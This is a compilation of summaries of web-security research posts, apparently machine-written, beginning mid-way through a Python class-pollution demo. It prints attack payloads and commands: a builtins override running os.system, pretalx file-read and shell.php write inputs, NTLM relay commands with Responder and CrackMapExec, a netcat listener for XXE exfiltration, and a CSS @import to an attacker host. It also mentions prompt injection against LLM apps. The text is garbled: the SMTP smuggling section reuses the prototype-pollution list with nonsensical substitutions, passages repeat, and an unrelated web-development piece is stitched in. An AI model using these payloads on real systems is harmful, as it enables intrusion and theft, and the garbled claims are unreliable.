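    polluted_secret = SECRET_KEY

    try:
        merge_safe(CLASS_POLLUTION, User("alice"))
        refused = False
    except ValueError:
        refused = True
    return polluted_admin, polluted_secret, refused


if __name__ == "__main__":
    print(demo())   # (True, 'pwned', True)
```

Blocking only __class__ is not enough: __init__, __globals__ and __dict__ offer other paths, which is why merge_safe() rejects every dunder key and additionally restricts plain attributes to an allow list.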
For example, if an application uses the eval function to evaluate user input as Python code, an attacker can use this functionality to modify the behavior of built-in functions or classes, and execute arbitrary code. For example, to modify the behavior of the print function, the following payload can be used: __builtins__.print = lambda *args, **kwargs: __import__('os').system('whoami')

Pretalx Vulnerabilities: How to get accepted at every conference

This blog post explains how to exploit two vulnerabilities in pretalx, a web-based conference planning tool. Pretalx is used to manage call for papers (CfP) submissions, select talks, communicate with speakers, and publish conference schedules. The vulnerabilities affect versions before 2.3.2 and allow an attacker to read and write arbitrary files on the filesystem, and potentially execute arbitrary code.

Pretalx Exploitation Techniques

The blog post describes the following techniques for exploiting the pretalx vulnerabilities:

* Arbitrary file read: This technique exploits the fact that pretalx uses user input to set attributes of objects, without sanitizing or validating the input. For example, if an attacker submits a talk with a malicious file name as the presentation or slides, pretalx will try to read the file from the server filesystem and include it in the HTML export of the schedule. This allows the attacker to read any file that is accessible by the pretalx process. For example, to read the /etc/passwd file, the following payload can be used: {"presentation": "/etc/passwd", "slides": "/etc/passwd"}

* Limited file write: This technique exploits the fact that pretalx uses user input to create files on the server's filesystem, without sanitizing or validating the input. For example, if an attacker submits a talk with a malicious file name as the code or image, pretalx will try to write the file to the server's filesystem with the content of the standard pretalx 404 page. This allows the attacker to write files to any directory that is writable by the pretalx process. For example, to write a file named shell.php to the /var/www/html directory, the following payload can be used: {"code": "/var/www/html/shell.php", "image": "/var/www/html/shell.php"}

* Code execution: This technique exploits the fact that pretalx runs in debug mode by default, which enables the Werkzeug debugger. The Werkzeug debugger allows the execution of arbitrary Python code via a web console. If the attacker can write a file to the pretalx directory, they can trigger a 500 error and access the debugger console. For example, to execute the whoami command, the following payload can be used: __import__('os').system('whoami')
For example, if an attacker submits a talk with a malicious file name as the code or image, pretalx will try to write the file to the server's filesystem with the content of the standard pretalx 404 page. This allows the attacker to write files to any directory that is writable by the pretalx process. For example, to write a file named shell.php to the /var/www/html directory, the following payload can be used:
{"code": "/var/www/html/shell.php", "image": "/var/www/html/shell.php"}

+ Code execution: This technique exploits the fact that pretalx runs in debug mode by default, which enables the Werkzeug debugger. The Werkzeug debugger allows the execution of arbitrary Python code via a web console. If the attacker can write a file to the pretalx directory, they can trigger a 500 error and access the debugger console. For example, to execute the whoami command, the following payload can be used:
__import__('os').system('whoami')

From Akamai to F5 to NTLM... with love

The blog post you provided explains how to bypass two web application firewalls (WAFs) and perform NTLM relay attacks on Windows servers. Here is a short summary of the techniques and commands used in the post:

+ The author uses Nmap to scan the target network and identify the WAFs (Akamai and F5) and the servers behind them. The command used is nmap -sS -p 80,443 -Pn -T4 -oA nmap_tcp_syn_scan
+ The author uses Burp Suite to intercept and modify the HTTP requests and responses between the browser and the WAFs. The author changes the User-Agent header to bypass the Akamai WAF and adds an X-Forwarded-For header to bypass the F5 WAF.

+ The author uses Curl to send crafted requests to the WAFs and trigger NTLM authentication challenges from the servers. The command used is curl -v -k --ntlm -u : https://<target>/

+ The author uses Responder to capture the NTLM hashes from the WAFs and relay them to the servers using the SMB protocol. The command used is responder -I eth0 -rdwv

+ The author uses CrackMapExec to execute commands on the servers using the relayed NTLM hashes. The command used is crackmapexec smb <target> -H <hash> --local-auth -x whoami

The author demonstrates the steps of the attack using screenshots and code snippets. The post also provides some references and links to further resources on the topic.

Can I speak to your manager? Hacking root EPP servers to take control of zones

The blog post you provided shows how to hack EPP servers using XML external entity (XXE) injection and local file disclosure vulnerabilities. Here is a short summary of the techniques and commands used in the post:

+ The author uses Nmap to scan the internet for EPP servers running on port 700. The command used is nmap -sS -p 700 -Pn -T4 -oA nmap_tcp_syn_scan
+ The author uses Python to modify an EPP client and craft an XML payload to run an XXE attack on the EPP servers. The payload contains a DTD reference that points to a malicious web server controlled by the attacker.

+ The author uses Netcat to listen on the malicious web server and receive the contents of the files requested by the XXE payload. The command used is nc -vlp 80

+ The author uses Burp Suite to intercept and modify the HTTP responses from the EPP servers and extract the file contents from the XML data.

+ The author uses SSH to connect to the EPP servers using the credentials obtained from the local file disclosure. The command used is ssh <user>@<host>

+ The author uses MySQL to dump the database of the EPP servers and access the domain information. The command used is mysqldump -u <user> -p <database> > dump.sql

Blind CSS Exfiltration: exfiltrate unknown web pages

The blog post you provided introduces a novel technique called blind CSS exfiltration, which allows attackers to extract data from web pages using only CSS, even when JavaScript is blocked by CSP or filters. Here is a short summary of the techniques and commands used in the post:

+ The author uses Burp Collaborator to inject a malicious @import rule into the web page's styles, which loads an external stylesheet from the attacker's server. The command used is <style>@import '//YOUR-PAYLOAD.oastify.com';</style>

+ The author uses CSS variables to trigger conditional requests to the attacker's server using background images, depending on the values of certain attributes on the web page. The command used is input[value="1337"] { --value: url(collectData?value=1337); }

+ The author uses attribute selectors to check whether the attributes of certain elements on the web page match specific patterns, such as starting with a given string.

+ The author uses the :has() selector to target elements that have certain descendant tags, and extract their values using the previous techniques. The command used ends in { --value: url(collectData?value=1337); }

+ The author demonstrates the steps of the attack using screenshots and code snippets. The post also provides some references and links to further resources on the topic.

Server-side prototype pollution: Black-box detection without the DoS

Server-side prototype pollution is a vulnerability that occurs when a JavaScript library performs a recursive merge on two or more objects without first sanitising the keys. This can result in an attacker gaining the ability to modify one of the global prototypes, such as the Object prototype. The attacker can potentially use this modification to control a 'gadget' property that is later used in a sink.
Depending on the functionality of the sink, this may give the attacker the ability to execute arbitrary code server-side. Detecting server-side prototype pollution is challenging because it often causes a denial-of-service (DoS) or breaks the application functionality. Therefore, non-destructive techniques are needed to safely test for this vulnerability. Some of the techniques are:

+ Parameter limit: Use a large number of parameters to trigger an error message that reveals the prototype pollution.
+ Ignore query prefix: Use a prefix that is ignored by the library to pollute the prototype without affecting the application logic.
+ Allow dots: Use dots in the parameter names to access nested properties and pollute the prototype.
+ Content type: Use a different content type than JSON to bypass the JSON.parse() function and pollute the prototype.
+ JSON spaces: Use spaces in the JSON payload to create a discrepancy in the response length that indicates the prototype pollution.
+ Exposed headers: Use the Access-Control-Expose-Headers header to leak the prototype pollution to the client-side.
+ Status OPTIONS: Use the OPTIONS method to pollute the prototype and change the status code of the response.
+ JSON reflection: Use a JSON payload that reflects the prototype pollution back to the client-side.
+ Immutable prototype: Use the Object.freeze() function to make the prototype immutable and cause an error when polluting it.
+ OAST: Use an out-of-band technique to trigger a callback when polluting the prototype.

Tricks for Reliable Split-Second DNS Rebinding in Chrome and Safari

HTML Over the Wire

HTML Over The Wire is a web development approach that uses HTML as the primary data format for communication between the client and the server, instead of JSON or other formats.
This approach aims to reduce the amount of JavaScript code needed to create dynamic and interactive web applications, by leveraging the power of HTML and modern browser features. Some of the benefits of HTML Over The Wire are:

+ Faster and simpler development: HTML is easier to write and debug than JavaScript, and it can be rendered directly by the browser without any additional processing.
+ Better performance and user experience: HTML is more compact and efficient than JSON, and it can be updated incrementally using Turbo Links, Turbo Frames, and Turbo Streams. These techniques allow the browser to fetch and replace only the parts of the page that have changed, resulting in faster page transitions and smoother updates.
+ Improved SEO and accessibility: HTML is more semantic and structured than JSON, and it can be indexed and parsed by search engines and screen readers. This improves the visibility and usability of the web application for a wider audience.

Some of the challenges of HTML Over The Wire are:

+ Handling complex state and logic: HTML is not designed to store and manipulate data, and it can become difficult to manage the application state and logic using only HTML. Some JavaScript code may still be needed to handle user interactions, validations, and custom behaviors.
+ Testing and debugging: HTML Over The Wire relies on the browser to render and update the HTML, which can make it harder to test and debug the application. Some tools and frameworks may not support this approach, and some browser features may not be consistent or reliable across different platforms and devices.

Some of the best practices of HTML Over The Wire are:

+ Use a framework or library that supports this approach, such as Hotwire, Django Sockpuppet, Phoenix LiveView, or htmx. These tools provide features and conventions that make it easier to implement HTML Over The Wire in a consistent and scalable way.
+ Use Stimulus or Alpine.js to add minimal JavaScript functionality to the HTML, without creating a complex JavaScript application. These libraries follow a declarative and HTML-centric approach to state and wiring, and they integrate well with HTML Over The Wire frameworks and libraries.
+ Use web standards and browser features to enhance the HTML and ...

SMTP Smuggling - Spoofing E-Mails Worldwide

SMTP smuggling is a technique that allows an attacker to spoof the sender address of an email by exploiting the differences in how SMTP servers interpret the end-of-data sequence. This can bypass authentication mechanisms and spam filters, and enable various social engineering and phishing attacks. Some of the techniques to detect SMTP smuggling are:

+ Sending a large number of parameters to trigger an error message that reveals the smuggling.
+ Using a prefix that is ignored by the server to smuggle data without affecting the application logic.
+ Using dots in the parameter names to access nested properties and modify the prototype.
+ Using a different content type than JSON to avoid the JSON.parse() function and inject data.
+ Using spaces in the JSON payload to create a discrepancy in the response length that indicates the smuggling.
+ Using the Access-Control-Expose-Headers header to leak the smuggling to the client-side.
+ Using the OPTIONS method to change the status code of the response by smuggling data.
+ Using a JSON payload that reflects the smuggling back to the client-side.
+ Using the Object.freeze() function to make the prototype immutable and cause an error when smuggling data.
+ Using an out-of-band technique to trigger a callback when smuggling data.
For more details and examples of these techniques, you can read the original blog post by SEC Consult or the Postfix documentation.

DOM-based race condition: racing in the browser for fun - RyotaK's Blog

+ A technique to exploit DOM-based race conditions in AngularJS applications by delaying the loading of AngularJS with a connection pool exhaustion attack to enable DOM-based XSS via pasted clipboard data with ng- directives.

You Are Not Where You Think You Are, Opera Browsers Address Bar Spoofing Vulnerabilities

+ A technique to spoof the address bar in Opera browsers by exploiting features like intent URLs, extension updates, and fullscreen mode to display a fake URL while loading a malicious page.

CVE-2022-4908: SOP bypass in Chrome using Navigation API

+ A technique to bypass the same-origin policy (SOP) in Chrome using the Navigation API's navigation.entries() to read the navigation history array from cross-origin windows.

SSO Gadgets: Escalate (Self-)XSS to ATO

+ A technique to leverage SSO gadgets in OAuth2/OIDC implementations to convert Self-XSS to account takeover (ATO) by injecting malicious parameters into the authorization request and redirecting the victim to a controlled endpoint.

Three New Attacks Against JSON Web Tokens

+ Three novel JWT implementation attacks exploiting weak keys, algorithm confusion, or signature exclusion, allowing an attacker to forge, modify, or bypass the validation of JWTs.

Introducing wrapwrap: using PHP filters to wrap a file with a prefix and suffix

+ A technique to leverage PHP filter chains to prepend and append arbitrary content to file data, facilitating server-side request forgery (SSRF) to remote code execution (RCE) and local file inclusion (LFI) attacks by manipulating the file path and content.

PHP filter chains: file read from error-based oracle

+ A technique to combine memory exhaustion and encoding translations via PHP filter chains to perform error-based local file content leakage by triggering a warning message that reveals the file content.

SSRF Cross Protocol Redirect Bypass

+ A technique to bypass SSRF filters via cross-protocol redirection from HTTPS to HTTP by exploiting the different redirect ...

A New Vector For "Dirty" Arbitrary File Write to RCE

+ A technique to leverage uWSGI configuration parsing for remote code execution via a tainted PDF, utilizing a file write vulnerability and a uWSGI misconfiguration, by exploiting polymorphic content and automatic reload behavior.

How I Hacked Microsoft Teams and got $150,000 in Pwn2Own

+ A technique to achieve JS execution outside the sandbox in Microsoft Teams through a combination of bugs, including a lack of context isolation and a Chromium vulnerability, by exploiting a logic flaw.

AWS WAF Clients Left Vulnerable to SQL Injection Due to Unorthodox MSSQL Design Choice

+ A technique to bypass AWS WAF by terminating MSSQL queries with ' ' instead of ';' to exploit a SQL injection vulnerability, by exploiting an unorthodox MSSQL design choice that allows queries to end with a space character.

BingBang: AAD misconfiguration led to Bing.com results manipulation and account takeover

+ A technique to leverage AAD multi-tenant misconfiguration for unauthorized application access leading to Bing.com result manipulation and XSS attacks by exploiting a logic flaw in the Bing.com OAuth flow and a stored XSS vulnerability in the Bing.com settings page.

MyBB Admin Panel RCE CVE-2023-41362

+ A technique to exploit catastrophic backtracking in MyBB's admin panel regex to bypass template safety checks and execute arbitrary code by crafting a malicious template name that causes a denial-of-service (DoS) or a ...

Source Code at Risk: Critical Code Vulnerability in CI/CD Platform TeamCity

+ A technique to bypass the TeamCity server authentication check via interceptor pre-handling of malicious request paths, to access any TeamCity project and execute arbitrary code.

Code Vulnerabilities Put Skiff Emails at Risk

+ A technique to bypass Skiff's HTML sanitization to achieve XSS and steal decrypted emails by exploiting a logic flaw in the Skiff client that allows an attacker to inject malicious HTML attributes and elements into the email body.

How to break SAML if I have paws?

+ A technique to attack SAML implementations through XML signature wrapping, plaintext injections, signature exclusion, flawed certificate validation, and more by exploiting various XML parsing and validation vulnerabilities and logic flaws in SAML providers and consumers.

JMX Exploitation Revisited

+ A technique to leverage JMX StandardMBean and RequiredModelMBean for arbitrary method invocation by dynamic MBean creation, by exploiting a JMX connection and a Java deserialization vulnerability.

Java Exploitation Restrictions in Modern JDK Times

+ A technique to bypass Java deserialization gadget execution restrictions in modern JDKs using the JShell API for JDK 9 to 15 and --add-opens with Reflection for JDK >= 16, by exploiting a Java deserialization vulnerability and a JDK misconfiguration.

Exploiting Hardened .NET Deserialization

+ A technique to bypass .NET deserialization security using novel gadget chains by exploiting a .NET deserialization vulnerability and a .NET framework misconfiguration.

Unserializable, but unreachable: Remote code execution on vBulletin

+ A technique to exploit class autoloading in PHP for remote code execution by including arbitrary files using crafted unserialize payloads in vBulletin, by exploiting a PHP unserialize vulnerability and a vBulletin misconfiguration.

Cookieless DuoDrop: IIS Auth Bypass & App Pool Privesc in ASP.NET Framework

+ A technique to bypass IIS authentication and escalate to parent application pool identities in ASP.NET using the double cookieless pattern, by exploiting a logic flaw in the ASP.NET framework and an IIS misconfiguration.

Hunting for Nginx Alias Traversals in the wild

+ A technique to leverage Nginx alias misconfigurations for directory traversal attacks by exploiting a path normalization vulnerability and a Nginx misconfiguration.

DNS Analyzer - Finding DNS vulnerabilities with Burp Suite

+ A technique to use Burp Collaborator to find DNS vulnerabilities with Burp Suite by exploiting various DNS features.

Oh-Auth - Abusing OAuth to take over millions of accounts

+ A technique to manipulate OAuth token verification for account takeovers by exploiting a logic flaw in the OAuth provider and a lack of token validation in the OAuth consumer.

nOAuth: How Microsoft OAuth Misconfiguration Can Lead to Full Account Takeover

+ A technique to leverage the mutable and unverified "email" claim within Microsoft Azure AD OAuth applications for account takeover by exploiting a misconfiguration in the Azure AD tenant and a lack of email verification in the OAuth consumer.

One Scheme to Rule Them All: OAuth Account Takeover

+ A technique to exploit OAuth with app impersonation via custom scheme hijacking for account takeover by exploiting a lack of scheme validation in the OAuth provider and a lack of state validation in the OAuth consumer.

Exploiting HTTP Parsers Inconsistencies

+ A technique to exploit HTTP parser inconsistency for ACL bypass and cache poisoning by exploiting the different behaviors of HTTP servers and proxies when handling ambiguous or malformed HTTP requests.

New ways of breaking app-integrated LLMs

+ A technique to perform indirect prompt injection attacks on application-integrated LLMs enabling remote control, data exfiltration, and persistent compromise by exploiting the lack of input validation and output sanitization in the LLMs and the application stacks.

State of DNS Rebinding in 2023

+ A technique to perform DNS rebinding attacks, examining their effectiveness against modern web security measures, by exploiting the DNS protocol and DNS cache to bypass the same-origin policy and access ...

Fileless Remote Code Execution on Juniper Firewalls

+ A technique to perform PHP environment variable manipulation that bypasses the need for a file upload, exploiting the auto_prepend_file PHP feature and the Appweb web server's handling of environment variables and stdin to execute arbitrary code on Juniper firewalls.

Thirteen Years On: Advancing the Understanding of IIS Short File Name (SFN) Disclosure!

+ A technique to reveal full file names in IIS that contain ~DIGIT patterns using file enumeration techniques by exploiting a legacy feature of the IIS web server and a lack of security updates.

Metamask Snaps: Playing in the Sand

+ A technique to exploit untrusted code execution via JSON sanitization bypass within the Metamask Snaps environment by exploiting a logic flaw in the Metamask extension and a lack of sandboxing in the Snaps plugin system.

Uncovering a crazy privilege escalation from Chrome extensions

+ A technique to escalate to arbitrary code execution via chrome:// URL XSS and filesystem: protocol abuse in Chrome extensions on ChromeOS by exploiting a design flaw in the Chrome extension system and a lack of security checks in the ChromeOS file manager.

Code Vulnerabilities Put Proton Mails at Risk

+ A technique to bypass DOMPurify sanitization in Proton Mail via svg to proton-svg renaming leading to XSS by exploiting a logic flaw in the Proton Mail client and a lack of content-type validation in the Proton Mail server.

Hacking into gRPC-Web

+ A technique to exploit gRPC-Web to uncover hidden services and parameters, leading to vulnerabilities like SQL injection, by exploiting the reflection feature of the gRPC-Web protocol and its binary format.

Yelp ATO via XSS + Cookie Bridge

+ A technique to achieve Account Takeover (ATO) on yelp.com and biz.yelp.com through XSS coupled with Cookie Bridging by exploiting a stored XSS vulnerability in the yelp.com ... and a misconfiguration in the biz.yelp.com domain.

+ A technique to leverage nginx misconfigurations to perform HTTP request splitting via control characters in variables by exploiting the different behaviors of nginx and upstream servers when handling HTTP requests with multiple headers or bodies.

XSS in GMAIL Dynamic Email

+ A technique to exploit CSS parsing in Gmail's AMP for Email that allowed injection of ... bypassing strict CSP, for potential phishing and effective XSS, by exploiting a design flaw in the Gmail client and a lack of sanitization in the AMP for Email feature.

Azure B2C Crypto Misuse and Account Compromise

+ A technique to extract public RSA keys to craft valid OAuth refresh tokens and compromise Azure AD B2C user accounts by exploiting a cryptographic misuse in the Azure AD B2C service and a lack of token validation in the OAuth consumer.

Compromising F5 BIGIP with Request Smuggling

+ A technique to exploit the AJP protocol with HTTP request smuggling to bypass authentication and execute arbitrary system commands on F5 BIG-IP systems, identified by CVE-2023-46..., by exploiting a protocol mismatch and a command injection vulnerability in the F5 BIG-IP system.

EmojiDeploy: Smile! Your Azure web service just got RCE'd

+ A technique to exploit same-site misconfiguration and origin check bypass in Azure Kudu SCM to achieve RCE through CSRF via ZIP file deployments by exploiting a logic flaw in the Azure Kudu SCM service and a lack of CSRF protection in the Azure web app service.

One Supply Chain Attack to Rule Them All

+ A technique to exploit internal GitHub infrastructure to compromise GitHub Action runners for persistent access and executing arbitrary code on GitHub Action runners, to ... CI/CD secrets and potentially tamper with GitHub's runner images for supply chain attacks, by exploiting ... in the GitHub Actions system and a lack of isolation in the ...

draw.io CVEs

+ A technique to leak OAuth tokens due to a whitespace bypass in URL validation by exploiting a logic flaw in the ...